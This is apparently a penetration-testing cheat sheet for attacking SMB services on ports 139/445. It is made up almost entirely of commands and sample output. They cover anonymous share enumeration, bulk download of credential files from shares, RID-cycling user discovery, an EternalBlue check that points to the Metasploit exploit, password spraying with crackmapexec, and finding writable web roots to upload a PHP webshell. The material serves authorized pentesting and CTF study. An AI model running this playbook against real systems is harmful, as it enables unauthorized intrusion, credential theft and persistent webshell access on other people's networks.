SMB (139/445)
Null session enum
Comprehensive SMB enum — Users, shares, policies, groups
enum4linux -a $IP
Example Output
enum4linux -a 10.10.10.5
[+] Users:
administrator, guest, krbtgt, john.smith
[+] Shares:
IPC$, ADMIN$, C$, Backups, Users
List shares (null)
Anonymous share listing — Find accessible shares
smbclient -L //$IP -N
Example Output
smbclient -L //10.10.10.5 -N
Sharename Type Comment
-------- ---- -------
Backups Disk Company backups
Users Disk User directories
ADMIN$ Disk Remote Admin
List shares (crackmapexec)
Alternative enum — Shows read/write permissions
crackmapexec smb $IP --shares -u '' -p ''
Example Output
crackmapexec smb 10.10.10.5 --shares -u '' -p ''
Share Permissions Remark
Backups READ Company backups
Users READ,WRITE User files
ADMIN$ NO ACCESS
(READ,WRITE on Users = upload potential)
Connect to shares
Browse each share — Download interesting files
smbclient //$IP/<share> -N
Example Output
smbclient //10.10.10.5/Backups -N
smb: \> ls
. D 0 Jan 01 2024
old_config.bak A 1024 Jan 01 2024
passwords.xlsx A 2048 Jan 01 2024
smb: \> get passwords.xlsx
Recursive download share
Grab everything — Offline analysis
smbget -R smb://$IP/<share>/
Example Output
smbget -R smb://10.10.10.5/Backups/
Downloaded 15 files
./Backups/IT/credentials.txt
./Backups/HR/employee_list.csv
(Analyze everything offline)
Enumerate users (RID cycling)
Find domain users — Build user list
crackmapexec smb $IP --rid-brute
Example Output
crackmapexec smb 10.10.10.5 --rid-brute
500: CORP\Administrator
501: CORP\Guest
1001: CORP\john.smith
1002: CORP\svc_sql
1003: CORP\admin.backup
Check for EternalBlue
MS17-010 — Instant SYSTEM shell if vuln
nmap --script smb-vuln-ms17-010 -p 445 $IP
Example Output
| smb-vuln-ms17-010:
| VULNERABLE:
| Risk factor: HIGH
(Use exploit/windows/smb/ms17_010_eternalblue)
Check SMB version/signing
Version and signing status — SMBv1 = more exploits, no signing = relay
crackmapexec smb $IP
Example Output
crackmapexec smb 10.10.10.5
SMB 10.10.10.5 445 TARGET [*] Windows 10.0 Build 17763 x64
SMB 10.10.10.5 445 TARGET [*] SMBv1: False
SMB 10.10.10.5 445 TARGET [*] Signing: False
(No signing = relay attacks possible)
Brute force with found users
Spray found creds — Password reuse across services
crackmapexec smb $IP -u users.txt -p passwords.txt
Example Output
crackmapexec smb 10.10.10.5 -u users.txt -p passwords.txt --continue-on-success
SMB [-] corp\admin:Password1
SMB [-] corp\admin:Welcome1
SMB [+] corp\john.smith:Winter2025
(--continue-on-success finds ALL valid combos)
Check for write access
Can you upload files? — Upload to web root or share
smbclient //$IP/<share>
put test.txt
Example Output
smbmap -H 10.10.10.5 -u john -p Password1
Disk Permissions Comment
---- ----------- -------
Backups READ ONLY
Users READ, WRITE <- can upload!
wwwroot READ, WRITE <- webshell target!
(WRITE on wwwroot = upload PHP shell)